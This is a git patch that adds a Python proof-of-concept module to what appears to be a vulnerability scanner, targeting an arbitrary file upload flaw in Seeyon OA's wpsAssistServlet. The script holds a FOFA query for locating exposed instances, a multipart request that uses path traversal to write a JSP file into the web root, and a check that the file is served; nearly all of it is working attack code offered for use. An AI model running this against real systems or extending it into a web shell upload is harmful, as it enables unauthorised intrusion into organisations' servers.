From 4622870f309ddbda02944432c39d8546f506404d Mon Sep 17 00:00:00 2001
From: CSeroad <59865739+cseroad@users.noreply.github.com>
Date: Mon, 16 Jan 2023 11:06:54 +0800
Subject: [PATCH] =?UTF-8?q?=E6=96=B0=E5=A2=9EwpsAssistServlet=E4=B8=8A?=
 =?UTF-8?q?=E4=BC=A0?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../Seeyon_OA_wpsAssistServlet_upload.py      | 47 +++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 Moudle/Seeyon/Seeyon_OA_wpsAssistServlet_upload.py

diff --git a/Moudle/Seeyon/Seeyon_OA_wpsAssistServlet_upload.py b/Moudle/Seeyon/Seeyon_OA_wpsAssistServlet_upload.py
new file mode 100644
index 0000000..09ca6b9
--- /dev/null
+++ b/Moudle/Seeyon/Seeyon_OA_wpsAssistServlet_upload.py
@@ -0,0 +1,47 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+
+import requests
+import random
+import re
+from Config.config_requests import headers
+from Config.config_requests import ua
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+# 脚本信息
+######################################################
+NAME='Seeyon_OA_wpsAssistServlet_upload'
+AUTHOR="CSeroad"
+REMARK='致远OA wpsAssistServlet 任意文件上传'
+FOFA_RULE='title="致远A8+协同管理软件.A6"'
+######################################################
+
+headers = {'User-Agent': ua,
+           'Content-Type': 'multipart/form-data; boundary=-***'}
+
+def poc(target):
+    result = {}
+    data = '''
+---***
+Content-Disposition: form-data; name="upload"; filename=""\r\nContent-Type: image/jpeg\r\n\r\n<% out.println("loglog");%>\r\n---***--'''
+    vuln_url = target + "/seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/logs.txt&fileId=2"
+    try:
+        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+        requests.post(url=vuln_url,headers=headers,data=data,timeout=5, verify=False)
+        r1 = requests.get(url = target+"/logs.txt")
+        if 'loglog' in r1.text and r1.status_code == 200:
+            result['target'] = target
+            result['poc'] = NAME
+            result['vuln_url'] = target+"/logs.txt"
+            return result
+        else:
+            pass
+    except Exception as e:
+        pass
+
+def exp(target):
+    pass
+
+
+if __name__ == '__main__':
+    poc("https://127.0.0.1")
\ No newline at end of file